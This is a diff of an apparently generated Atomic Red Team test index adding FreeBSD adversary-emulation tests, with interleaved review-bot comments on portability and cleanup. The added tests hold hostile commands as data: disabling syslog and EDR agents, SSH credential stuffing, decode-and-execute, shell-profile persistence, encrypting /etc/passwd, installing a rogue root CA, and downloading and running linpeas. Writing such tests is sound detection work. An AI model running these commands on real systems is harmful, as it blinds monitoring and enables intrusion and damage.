@@ -511671,6 +513269,7 @@ ], "command_list": [ "systemctl stop rsyslog ; systemctl disable rsyslog\n", + "service syslogd stop\nsysrc syslogd_enable=\"NO\"\n", "if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq \"6\" ];\nthen\n service cbdaemon stop\n chkconfig off cbdaemon\nelse if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq \"7\" ];\n systemctl stop cbdaemon\n systemctl disable cbdaemon\nfi\n", "setenforce 0\n", "sudo systemctl stop falcon-sensor.service\nsudo systemctl disable falcon-sensor.service\n", @@ -511774,6 +513373,20 @@ "elevation_required": true } }, + { + "name": "Disable syslog (freebsd)", + "auto_generated_guid": "db9de996-441e-4ae0-947b-61b6871e2fdf", + "description": "Disables syslog collection\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "service syslogd stop\nsysrc syslogd_enable=\"NO\"\n", + "cleanup_command": "sysrc syslogd_enable=\"YES\"\nservice syslogd start\n", + "name": "sh", + "elevation_required": true + } + }, { "name": "Disable Cb Response", "auto_generated_guid": "ae8943f7-0f8d-44de-962d-fbc2e2f03eb8", @@ -512490,7 +514103,7 @@ { "name": "Disable Memory Swap", "auto_generated_guid": "e74e4c63-6fde-4ad2-9ee8-21c3a1733114", - "description": "disable swapping of device paging that impaire the compromised host to swap data if the RAM is full. Awfulshred wiper used this technique as an additional \npayload to the compromised host and to make sure that there will be no recoverable data due to swap feature of linux.\n", + "description": "disable swapping of device paging that impaire the compromised host to swap data if the RAM is full. Awfulshred wiper used this technique as an additional \npayload to the compromised host and to make sure that there will be no recoverable data due to swap feature of FreeBSD/linux.\n", "supported_platforms": [ "linux" ], 
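Review bot: `Disable syslog (freebsd)` makes a persistent change: `sysrc syslogd_enable=\"NO\"` writes rc.conf, so if the executor is interrupted before `cleanup_command` runs the host comes back from its next reboot without syslog, and nothing in the test signals that. The one-line description `Disables syslog collection` should say so, e.g. `Stops syslogd and disables it in rc.conf; the change persists across reboots until cleanup runs.`; the same caveat applies to the `tor_enable` change in the Tor FreeBSD test.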
@@ -536296,6 +537909,7 @@ "command_list": [ "cp \"/T1110.004/src/credstuffuserpass.txt\" /tmp/\nfor unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d\":\" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d\":\" -f1`@localhost;done\n", "cp \"/T1110.004/src/credstuffuserpass.txt\" /tmp/\nfor unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d\":\" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d\":\" -f1`@localhost;done\n", + "cp /T1110.004/src/credstuffuserpass.txt /tmp/\nfor unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d\":\" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d\":\" -f1`@localhost;done\n", "cd \"\\..\\ExternalPayloads\"\n.\\kerbrute.exe bruteforce --dc $ENV:userdnsdomain -d $ENV:userdomain \"\\..\\ExternalPayloads\\bruteforce.txt\" \n" ], "commands": [], 
@@ -536364,6 +537978,34 @@ "command": "cp \"$PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt\" /tmp/\nfor unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d\":\" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d\":\" -f1`@#{target_host};done\n" } }, + { + "name": "SSH Credential Stuffing From FreeBSD", + "auto_generated_guid": "a790d50e-7ebf-48de-8daa-d9367e0911d4", + "description": "Using username,password combination from a password dump to login over SSH.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "target_host": { + "description": "IP Address / Hostname you want to target.", + "type": "string", + "default": "localhost" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Requires SSHPASS\n", + "prereq_command": "if [ -x \"$(command -v sshpass)\" ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "pkg install -y sshpass\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": false, + "command": "cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/\nfor unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d\":\" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d\":\" -f1`@#{target_host};done\n" + } + }, { "name": "Brute Force:Credential Stuffing using Kerbrute Tool", "auto_generated_guid": "4852c630-87a9-409b-bb5e-5dc12c9ebcde", 
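Review bot: The FreeBSD executor copies `$PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt` unquoted, whereas the Linux test just above quotes the same expansion (`cp \"$PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt\" /tmp/`), so the new test breaks when the atomics folder path contains a space; quoting it the same way keeps the two consistent. `ssh -o 'StrictHostKeyChecking=no'` is inherited from the existing test and is acceptable with the `localhost` default, but the `target_host` description should mention that the host key is not verified for whatever target is supplied.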
@@ -538294,7 +539936,7 @@ } ], "command_list": [ - "cat /tmp/encoded.dat | base64 -d > /tmp/art.sh\nchmod +x /tmp/art.sh\n/tmp/art.sh\n", + "if [ \"$(uname)\" = 'FreeBSD' ]; then cmd=\"b64decode -r\"; else cmd=\"base64 -d\"; fi;\ncat /tmp/encoded.dat | $cmd > /tmp/art.sh\nchmod +x /tmp/art.sh\n/tmp/art.sh\n", "$OriginalCommand = 'Write-Host \"Hey, Atomic!\"'\n$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)\n$EncodedCommand =[Convert]::ToBase64String($Bytes)\n$EncodedCommand\npowershell.exe -EncodedCommand $EncodedCommand\n", "$OriginalCommand = 'Write-Host \"Hey, Atomic!\"'\n$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)\n$EncodedCommand =[Convert]::ToBase64String($Bytes)\n$EncodedCommand\n\nSet-ItemProperty -Force -Path HKCU:Software\\Microsoft\\Windows\\CurrentVersion -Name Debug -Value $EncodedCommand\npowershell.exe -Command \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:Software\\Microsoft\\Windows\\CurrentVersion Debug).Debug)))\"\n", "\"\\..\\ExternalPayloads\\temp_T1027.zip\\T1027.exe\"\n", @@ -538665,11 +540307,11 @@ { "description": "encode the command into base64 file\n", "prereq_command": "if [ -e \"/tmp/encoded.dat\" ]; then exit 0; else exit 1; fi\n", - "get_prereq_command": "echo \"#{shell_command}\" | base64 > /tmp/encoded.dat\n" + "get_prereq_command": "if [ \"$(uname)\" = 'FreeBSD' ]; then cmd=\"b64encode -r -\"; else cmd=\"base64\"; fi;\necho \"#{shell_command}\" | $cmd > /tmp/encoded.dat\n" } ], "executor": { - "command": "cat /tmp/encoded.dat | base64 -d > /tmp/art.sh\nchmod +x /tmp/art.sh\n/tmp/art.sh\n", + "command": "if [ \"$(uname)\" = 'FreeBSD' ]; then cmd=\"b64decode -r\"; else cmd=\"base64 -d\"; fi;\ncat /tmp/encoded.dat | $cmd > /tmp/art.sh\nchmod +x /tmp/art.sh\n/tmp/art.sh\n", "cleanup_command": "rm /tmp/encoded.dat \nrm /tmp/art.sh\n", "name": "sh" } 
@@ -545587,6 +547229,7 @@ ], "command_list": [ "cat /etc/pam.d/common-password\n", + "cat /etc/pam.d/passwd\n", "cat /etc/security/pwquality.conf\n", "cat /etc/pam.d/system-auth\ncat /etc/security/pwquality.conf\n", "cat /etc/login.defs\n", @@ -545661,6 +547304,18 @@ "name": "bash" } }, + { + "name": "Examine password complexity policy - FreeBSD", + "auto_generated_guid": "a7893624-a3d7-4aed-9676-80498f31820f", + "description": "Lists the password complexity policy to console on FreeBSD.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "cat /etc/pam.d/passwd\n", + "name": "sh" + } + }, { "name": "Examine password complexity policy - CentOS/RHEL 7.x", "auto_generated_guid": "78a12e65-efff-4617-bc01-88f17d71315d", @@ -548817,6 +550472,7 @@ "command_list": [ "echo 'echo \"Hello from Atomic Red Team T1546.004\" > /tmp/T1546.004' >> ~/.bash_profile\n", "echo 'echo \"Hello from Atomic Red Team T1546.004\" > /tmp/T1546.004' >> ~/.bashrc\n", + "echo 'echo \"Hello from Atomic Red Team T1546.004\" > /tmp/T1546.004' >> ~/.shrc\n", "echo '# Hello from Atomic Red Team T1546.004' >> /etc/profile\n", "echo '# Atomic Red Team was here... T1546.004' >> ~/.profile\n", "echo '# Atomic Red Team was here... T1546.004' >> /etc/profile.d/bash_completion.sh\n", @@ -548827,10 +550483,10 @@ "parsed_datasets": [ { "source": "atomics/T1546.004/T1546.004.yaml", - "name": "Atomic Red Team Test - Event Triggered Execution: .bash_profile and .bashrc", + "name": "Atomic Red Team Test - Event Triggered Execution: .bash_profile .bashrc and .shrc", "content": { "attack_technique": "T1546.004", - "display_name": "Event Triggered Execution: .bash_profile and .bashrc", + "display_name": "Event Triggered Execution: .bash_profile .bashrc and .shrc", "atomic_tests": [ { "name": "Add command to .bash_profile", 
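Review bot: `Examine password complexity policy - FreeBSD` prints `/etc/pam.d/passwd`, which is the PAM stack for the passwd command, but on FreeBSD the length and ageing settings (`minpasswordlen`, `passwordtime`) live in `/etc/login.conf` as far as I recall, so the test misses the policy its name promises. `cat /etc/pam.d/passwd\ncat /etc/login.conf\n` would cover both, and the description could name the two files.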
@@ -548874,6 +550530,26 @@ "name": "sh" } }, + { + "name": "Add command to .shrc", + "auto_generated_guid": "41502021-591a-4649-8b6e-83c9192aff53", + "description": "Adds a command to the .shrc file of the current user\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "command_to_add": { + "description": "Command to add to the .shrc file", + "type": "string", + "default": "echo \"Hello from Atomic Red Team T1546.004\" > /tmp/T1546.004" + } + }, + "executor": { + "command": "echo '#{command_to_add}' >> ~/.shrc\n", + "cleanup_command": "head -n '-2' ~/.shrc > /tmp/T1546.004\nmv /tmp/T1546.004 ~/.shrc\n", + "name": "sh" + } + }, { "name": "Append to the system shell profile", "auto_generated_guid": "694b3cc8-6a78-4d35-9e74-0123d009e94b", @@ -551724,7 +553400,7 @@ "command_list": [ "echo \"passwd\" | $which_gpg --batch --yes --passphrase-fd 0 --cipher-algo AES-256 -o /tmp/passwd.gpg -c /etc/passwd\n", "$which_7z a -ppasswd /tmp/passwd.zip /etc/passwd\n", - "if [[ $USER == \"root\" ]]; then $which_ccencrypt /etc/passwd; file /etc/passwd.cpt; sudo su; else $which_ccencrypt ~/.bash_history; file ~/.bash_history.cpt; sudo su; fi\n", + "if [ $USER == \"root\" ]; then $which_ccencrypt /etc/passwd; file /etc/passwd.cpt; sudo su; else $which_ccencrypt ~/.bash_history; file ~/.bash_history.cpt; sudo su; fi\n", "$which_openssl genrsa -out /tmp/key.pem 2048\n$which_openssl rsa -in /tmp/key.pem -pubout -out /tmp/pub.pem\n$which_openssl rsautl -encrypt -inkey /tmp/pub.pem -pubin -in /etc/passwd -out /tmp/passwd.zip\n", "echo T1486 - Purelocker Ransom Note > %USERPROFILE%\\Desktop\\YOUR_FILES.txt\n", "7z a -p ARTPass -mhe=on ARTArchive.7z ~/test.txt\n", 
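Review bot: The cleanup for `Add command to .shrc` uses `head -n '-2' ~/.shrc`, a GNU-style negative line count that BSD head rejects as far as I recall, so on the FreeBSD target the cleanup fails and leaves the appended command in place; it also trims two lines although the command appended one, and it uses `/tmp/T1546.004` as scratch space, which is the marker file the default `command_to_add` writes. A `mktemp` scratch file and removing only the appended line, e.g. `tmp=$(mktemp) && grep -vF '#{command_to_add}' ~/.shrc > \"$tmp\" && mv \"$tmp\" ~/.shrc`, works with both heads.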
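Review bot: `if [ $USER == \"root\" ]` replaces `[[` with `[` but keeps `==`, which is not a POSIX test operator; dash, the `/bin/sh` on Debian-family systems, rejects it with `unexpected operator`, so the command now fails on part of the Linux population the test lists. `$USER` is also left unquoted, so an unset variable turns the test into `[ == root ]`. `if [ \"$USER\" = \"root\" ]; then` fixes both; the same construct appears three times in the `@@ -551853` hunk (prereq_command, command and cleanup_command).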
@@ -551742,7 +553418,7 @@ "display_name": "Data Encrypted for Impact", "atomic_tests": [ { - "name": "Encrypt files using gpg (Linux)", + "name": "Encrypt files using gpg (FreeBSD/Linux)", "auto_generated_guid": "7b8ce084-3922-4618-8d22-95f996173765", "description": "Uses gpg to encrypt a file\n", "supported_platforms": [ @@ -551775,18 +553451,18 @@ { "description": "Finds where gpg is located\n", "prereq_command": "which_gpg=`which gpg`\n", - "get_prereq_command": "(which yum && yum -y install epel-release gpg)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y gpg)\n" + "get_prereq_command": "(which pkg && pkg install -y gnupg)||(which yum && yum -y install epel-release gpg)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y gpg)\n" } ], "executor": { - "name": "bash", + "name": "sh", "elevation_required": false, "command": "echo \"#{pwd_for_encrypted_file}\" | $which_gpg --batch --yes --passphrase-fd 0 --cipher-algo #{encryption_alg} -o #{encrypted_file_path} -c #{input_file_path}\n", "cleanup_command": "rm #{encrypted_file_path}\n" } }, { - "name": "Encrypt files using 7z (Linux)", + "name": "Encrypt files using 7z (FreeBSD/Linux)", "auto_generated_guid": "53e6735a-4727-44cc-b35b-237682a151ad", "description": "Uses 7z to encrypt a file\n", "supported_platforms": [ 
@@ -551814,18 +553490,18 @@ { "description": "Finds where 7z is located\n", "prereq_command": "which_7z=`which 7z`\n", - "get_prereq_command": "" + "get_prereq_command": "(which pkg && pkg install -y 7-zip)\n" } ], "executor": { - "name": "bash", + "name": "sh", "elevation_required": false, "command": "$which_7z a -p#{pwd_for_encrypted_file} #{encrypted_file_path} #{input_file_path}\n", "cleanup_command": "$which_7z e #{encrypted_file_path}\nrm #{encrypted_file_path}\n" } }, { - "name": "Encrypt files using ccrypt (Linux)", + "name": "Encrypt files using ccrypt (FreeBSD/Linux)", "auto_generated_guid": "08cbf59f-85da-4369-a5f4-049cffd7709f", "description": "Attempts to encrypt data on target systems as root to simulate an inturruption authentication to target system. If root permissions are not available then attempts to encrypt data within user's home directory.\n", "supported_platforms": [ 
@@ -551853,23 +553529,23 @@ "default": "sudo su" } }, - "dependency_executor_name": "bash", + "dependency_executor_name": "sh", "dependencies": [ { "description": "Finds where ccencrypt and ccdecrypt is located and copies input file\n", - "prereq_command": "which_ccencrypt=`which ccencrypt`\nwhich_ccdecrypt=`which ccdecrypt`\nif [[ $USER == \"root\" ]]; then cp #{root_input_file_path} #{cped_file_path}; else cp #{user_input_file_path} #{cped_file_path}; fi\n", - "get_prereq_command": "(which yum && yum -y install epel-release ccrypt)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y ccrypt)\n" + "prereq_command": "which_ccencrypt=`which ccencrypt`\nwhich_ccdecrypt=`which ccdecrypt`\nif [ $USER == \"root\" ]; then cp #{root_input_file_path} #{cped_file_path}; else cp #{user_input_file_path} #{cped_file_path}; fi\n", + "get_prereq_command": "(which pkg && pkg install -y ccript)||(which yum && yum -y install epel-release ccrypt)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y ccrypt)\n" } ], "executor": { - "name": "bash", + "name": "sh", "elevation_required": false, - "command": "if [[ $USER == \"root\" ]]; then $which_ccencrypt #{root_input_file_path}; file #{root_input_file_path}.cpt; #{impact_command}; else $which_ccencrypt #{user_input_file_path}; file #{user_input_file_path}.cpt; #{impact_command}; fi\n", - "cleanup_command": "if [[ $USER == \"root\" ]]; then mv #{cped_file_path} #{root_input_file_path}; else cp #{cped_file_path} #{user_input_file_path}; fi \n" + "command": "if [ $USER == \"root\" ]; then $which_ccencrypt #{root_input_file_path}; file #{root_input_file_path}.cpt; #{impact_command}; else $which_ccencrypt #{user_input_file_path}; file #{user_input_file_path}.cpt; #{impact_command}; fi\n", + "cleanup_command": "if [ $USER == \"root\" ]; then mv #{cped_file_path} #{root_input_file_path}; else cp #{cped_file_path} #{user_input_file_path}; fi \n" } }, { - "name": "Encrypt files using openssl (Linux)", + "name": 
"Encrypt files using openssl (FreeBSD/Linux)", "auto_generated_guid": "142752dc-ca71-443b-9359-cf6f497315f1", "description": "Uses openssl to encrypt a file\n", "supported_platforms": [ @@ -551911,7 +553587,7 @@ } ], "executor": { - "name": "bash", + "name": "sh", "elevation_required": false, "command": "$which_openssl genrsa -out #{private_key_path} #{encryption_bit_size}\n$which_openssl rsa -in #{private_key_path} -pubout -out #{public_key_path}\n$which_openssl rsautl -encrypt -inkey #{public_key_path} -pubin -in #{input_file_path} -out #{encrypted_file_path}\n", "cleanup_command": "$which_openssl rsautl -decrypt -inkey #{private_key_path} -in #{encrypted_file_path}\nrm #{encrypted_file_path}\n" @@ -561427,7 +563103,7 @@ } }, { - "name": "Masquerading as Linux crond process.", + "name": "Masquerading as FreeBSD or Linux crond process.", "auto_generated_guid": "a315bfff-7a98-403b-b442-2ea1b255e556", "description": "Copies sh process, renames it as crond, and executes it to masquerade as the cron daemon.\n\nUpon successful execution, sh is renamed to `crond` and executed.\n", "supported_platforms": [ 
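Review bot: The new FreeBSD branch installs `ccript`, which looks like a typo for `ccrypt` (the yum and apt-get branches on the same line use `ccrypt`, and that is the port name as far as I know), so on FreeBSD `pkg install` fails and the `||` chain falls through to package managers that are not present. `(which pkg && pkg install -y ccrypt)||(which yum && yum -y install epel-release ccrypt)||...` is the intended line.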
@@ -579133,6 +580809,7 @@ ], "command_list": [ "openssl genrsa -out rootCA.key 4096\nopenssl req -x509 -new -nodes -key rootCA.key -sha256 -days 365 -subj \"/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com\" -out rootCA.crt\ncp rootCA.crt /etc/pki/ca-trust/source/anchors/\nupdate-ca-trust\n", + "openssl genrsa -out rootCA.key 4096\nopenssl req -x509 -new -nodes -key rootCA.key -sha256 -days 365 -subj \"/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com\" -out rootCA.crt\ncp rootCA.crt /usr/local/share/certs/\ncertctl rehash\n", "mv rootCA.crt /usr/local/share/ca-certificates\necho sudo update-ca-certificates\n", "sudo security add-trusted-cert -d -r trustRoot -k \"/Library/Keychains/System.keychain\" \"rootCA.crt\"\n", "$cert = Import-Certificate -FilePath rootCA.cer -CertStoreLocation Cert:\\LocalMachine\\My\nMove-Item -Path $cert.PSPath -Destination \"Cert:\\LocalMachine\\Root\"\n", 
@@ -579175,6 +580852,32 @@ "elevation_required": true } }, + { + "name": "Install root CA on FreeBSD", + "auto_generated_guid": "f4568003-1438-44ab-a234-b3252ea7e7a3", + "description": "Creates a root CA with openssl\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "cert_filename": { + "description": "Path of the CA certificate we create", + "type": "path", + "default": "rootCA.crt" + }, + "key_filename": { + "description": "Key we create that is used to create the CA certificate", + "type": "path", + "default": "rootCA.key" + } + }, + "executor": { + "command": "openssl genrsa -out #{key_filename} 4096\nopenssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj \"/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com\" -out #{cert_filename}\ncp #{cert_filename} /usr/local/share/certs/\ncertctl rehash\n", + "cleanup_command": "rm /usr/local/share/certs/#{cert_filename}\ncertctl rehash\n", + "name": "sh", + "elevation_required": true + } + }, { "name": "Install root CA on Debian/Ubuntu", "auto_generated_guid": "53bcf8a0-1549-4b85-b919-010c56d724ff", @@ -581400,7 +583103,7 @@ { "name": "C compile", "auto_generated_guid": "d0377aa6-850a-42b2-95f0-de558d80be57", - "description": "Compile a c file with either gcc or clang on Linux or Macos.\n", + "description": "Compile a c file with either gcc or clang on FreeBSD, Linux or Macos.\n", "supported_platforms": [ "linux", "macos" @@ -581422,13 +583125,13 @@ ], "executor": { "command": "gcc #{input_file} && ./a.out\nclang #{input_file} && ./a.out\n", - "name": "bash" + "name": "sh" } }, { "name": "CC compile", "auto_generated_guid": "da97bb11-d6d0-4fc1-b445-e443d1346efe", - "description": "Compile a c file with either gcc or clang on Linux or Macos.\n", + "description": "Compile a c file with either gcc or clang on FreeBSD, Linux or Macos.\n", "supported_platforms": [ "linux", "macos" 
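Review bot: The cleanup of `Install root CA on FreeBSD` removes `/usr/local/share/certs/#{cert_filename}`, but `cert_filename` is declared as a `path`, so any value with a directory component makes `cp` place the basename under `/usr/local/share/certs/` while `rm` targets a nested path that does not exist; the test then leaves a self-signed root trusted system-wide after `certctl rehash`. `rm \"/usr/local/share/certs/$(basename #{cert_filename})\"\ncertctl rehash\n` removes what was actually copied. The key and certificate generated in the working directory are also never deleted, and the description `Creates a root CA with openssl` does not mention that the CA is installed into the system trust store, which is the part a defender cares about.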
@@ -581450,13 +583153,13 @@ ], "executor": { "command": "g++ #{input_file} && ./a.out\nclang++ #{input_file} && ./a.out\n", - "name": "bash" + "name": "sh" } }, { "name": "Go compile", "auto_generated_guid": "78bd3fa7-773c-449e-a978-dc1f1500bc52", - "description": "Compile a c file with either gcc or clang on Linux or Macos.\n", + "description": "Compile a go file with golang on FreeBSD, Linux or Macos.\n", "supported_platforms": [ "linux", "macos" @@ -581478,7 +583181,7 @@ ], "executor": { "command": "go run #{input_file}\n", - "name": "bash" + "name": "sh" } } ] @@ -589373,6 +591076,7 @@ "get-process | ?{$_.Description -like \"*virus*\"}\nget-process | ?{$_.Description -like \"*carbonblack*\"}\nget-process | ?{$_.Description -like \"*defender*\"}\nget-process | ?{$_.Description -like \"*cylance*\"}\nget-process | ?{$_.Description -like \"*mc*\"}\nget-process | ?{$_.ProcessName -like \"*mc*\"}\nget-process | Where-Object { $_.ProcessName -eq \"Sysmon\" }\n", "ps aux | egrep 'Little\\ Snitch|CbOsxSensorService|falcond|nessusd|santad|CbDefense|td-agent|packetbeat|filebeat|auditbeat|osqueryd|BlockBlock|LuLu'\n", "ps aux | egrep 'falcond|nessusd|cbagentd|td-agent|packetbeat|filebeat|auditbeat|osqueryd'\n", + "pgrep -l 'bareos-fd|icinga2|cbagentd|wazuh-agent|packetbeat|filebeat|osqueryd'\n", "fltmc.exe | findstr.exe 385201\n", "wmic.exe /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List", "powershell Get-CimInstance -Namespace root/securityCenter2 -classname antivirusproduct\npowershell Get-WmiObject -Namespace root\\securitycenter2 -Class antivirusproduct\n", 
@@ -589441,6 +591145,18 @@ "name": "sh" } }, + { + "name": "Security Software Discovery - pgrep (FreeBSD)", + "auto_generated_guid": "fa96c21c-5fd6-4428-aa28-51a2fbecdbdc", + "description": "Methods to identify Security Software on an endpoint\nwhen sucessfully executed, command shell is going to display AV/Security software it is running.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "pgrep -l 'bareos-fd|icinga2|cbagentd|wazuh-agent|packetbeat|filebeat|osqueryd'\n", + "name": "sh" + } + }, { "name": "Security Software Discovery - Sysmon Service", "auto_generated_guid": "fe613cf3-8009-4446-9a0f-bc78a15b66c9", 
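Review bot: The new pgrep test exits with pgrep's status, which is 1 when none of the listed processes is running, so on a clean host the atomic reports a failed execution rather than "no security software found"; if the runner keys success off the exit code (not visible here), append `|| echo 'no matching agents found'` so the result is explicit and zero. The description still carries the typo "sucessfully", and the "(FreeBSD)" test is tagged `linux` without an OS guard, so a sentence noting that the pattern list targets FreeBSD port process names (bareos-fd and icinga2 are backup/monitoring daemons rather than AV) would help whoever reads the generated output. Fix in the source YAML; this file is generated.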
@@ -590791,10 +592507,10 @@ } ], "command_list": [ - "which_python=$(which python || which python3 || which python2)\n$which_python -c 'import requests;import os;url = \"https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh\";malicious_command = \"sh T1059.006-payload -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles\";session = requests.session();source = session.get(url).content;fd = open(\"T1059.006-payload\", \"wb+\");fd.write(source);fd.close();os.system(malicious_command)'\n", - "which_python=$(which python || which python3 || which python2)\necho 'import requests' > T1059.006.py\necho 'import os' >> T1059.006.py\necho 'url = \"https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh\"' >> T1059.006.py\necho 'malicious_command = \"sh T1059.006-payload -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles\"' >> T1059.006.py\necho 'session = requests.session()' >> T1059.006.py\necho 'source = session.get(url).content' >> T1059.006.py\necho 'fd = open(\"T1059.006-payload\", \"wb+\")' >> T1059.006.py\necho 'fd.write(source)' >> T1059.006.py\necho 'fd.close()' >> T1059.006.py\necho 'os.system(malicious_command)' >> T1059.006.py\n$which_python T1059.006.py\n", - "which_python=$(which python || which python3 || which python2)\necho 'import requests' > T1059.006.py\necho 'import os' >> T1059.006.py\necho 'url = \"https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh\"' >> T1059.006.py\necho 'malicious_command = \"sh T1059.006-payload -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles\"' >> T1059.006.py\necho 'session = requests.session()' >> T1059.006.py\necho 'source = session.get(url).content' >> T1059.006.py\necho 'fd = open(\"T1059.006-payload\", \"wb+\")' >> T1059.006.py\necho 'fd.write(source)' >> T1059.006.py\necho 'fd.close()' >> T1059.006.py\necho 'os.system(malicious_command)' >> T1059.006.py\n$which_python -c 'import 
py_compile; py_compile.compile(\"T1059.006.py\", \"T1059.006.pyc\")'\n$which_python T1059.006.pyc\n", - "which_python=$(which python || which python3 || which python2)\n$which_python -c \"import pty;pty.spawn('/bin/sh')\"\nexit\n$which_python -c \"import pty;pty.spawn('/bin/bash')\"\nexit" + "which_python=$(which python || which python3 || which python3.9 || which python2)\n$which_python -c 'import requests;import os;url = \"https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh\";malicious_command = \"sh T1059.006-payload -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles\";session = requests.session();source = session.get(url).content;fd = open(\"T1059.006-payload\", \"wb+\");fd.write(source);fd.close();os.system(malicious_command)'\n", + "which_python=$(which python || which python3 || which python3.9 || which python2)\necho 'import requests' > T1059.006.py\necho 'import os' >> T1059.006.py\necho 'url = \"https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh\"' >> T1059.006.py\necho 'malicious_command = \"sh T1059.006-payload -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles\"' >> T1059.006.py\necho 'session = requests.session()' >> T1059.006.py\necho 'source = session.get(url).content' >> T1059.006.py\necho 'fd = open(\"T1059.006-payload\", \"wb+\")' >> T1059.006.py\necho 'fd.write(source)' >> T1059.006.py\necho 'fd.close()' >> T1059.006.py\necho 'os.system(malicious_command)' >> T1059.006.py\n$which_python T1059.006.py\n", + "which_python=$(which python || which python3 || which python3.9 || which python2)\necho 'import requests' > T1059.006.py\necho 'import os' >> T1059.006.py\necho 'url = \"https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh\"' >> T1059.006.py\necho 'malicious_command = \"sh T1059.006-payload -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles\"' >> T1059.006.py\necho 'session = requests.session()' 
>> T1059.006.py\necho 'source = session.get(url).content' >> T1059.006.py\necho 'fd = open(\"T1059.006-payload\", \"wb+\")' >> T1059.006.py\necho 'fd.write(source)' >> T1059.006.py\necho 'fd.close()' >> T1059.006.py\necho 'os.system(malicious_command)' >> T1059.006.py\n$which_python -c 'import py_compile; py_compile.compile(\"T1059.006.py\", \"T1059.006.pyc\")'\n$which_python T1059.006.pyc\n", + "which_python=$(which python || which python3 || which python3.9 || which python2)\n$which_python -c \"import pty;pty.spawn('/bin/sh')\"\nexit\n$which_python -c \"import pty;pty.spawn('/bin/bash')\"\nexit" ], "commands": [], "queries": [], @@ -590825,7 +592541,7 @@ "default": "T1059.006-payload" }, "executor": { - "description": "Linux shell", + "description": "FreeBSD or Linux shell", "type": "string", "default": "sh" }, 
@@ -590839,18 +592555,18 @@ "dependencies": [ { "description": "Verify if python is in the environment variable path and attempt to import requests library.", - "prereq_command": "which_python=$(which python || which python3 || which python2); $which_python -V\n$which_python -c 'import requests' 2>/dev/null; echo $?\n", + "prereq_command": "which_python=$(which python || which python3 || which python3.9 || which python2); $which_python -V\n$which_python -c 'import requests' 2>/dev/null; echo $?\n", "get_prereq_command": "pip install requests\n" } ], "executor": { - "command": "which_python=$(which python || which python3 || which python2)\n$which_python -c 'import requests;import os;url = \"#{script_url}\";malicious_command = \"#{executor} #{payload_file_name} #{script_args}\";session = requests.session();source = session.get(url).content;fd = open(\"#{payload_file_name}\", \"wb+\");fd.write(source);fd.close();os.system(malicious_command)'\n", + "command": "which_python=$(which python || which python3 || which python3.9 || which python2)\n$which_python -c 'import requests;import os;url = \"#{script_url}\";malicious_command = \"#{executor} #{payload_file_name} #{script_args}\";session = requests.session();source = session.get(url).content;fd = open(\"#{payload_file_name}\", \"wb+\");fd.write(source);fd.close();os.system(malicious_command)'\n", "name": "sh", - "cleanup_command": "rm #{payload_file_name} \n" + "cleanup_command": "rm #{payload_file_name} \n" } }, { - "name": "Execute Python via scripts (Linux)", + "name": "Execute Python via scripts", "auto_generated_guid": "6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8", "description": "Create Python file (.py) that downloads and executes shell script via executor arguments", "supported_platforms": [ 
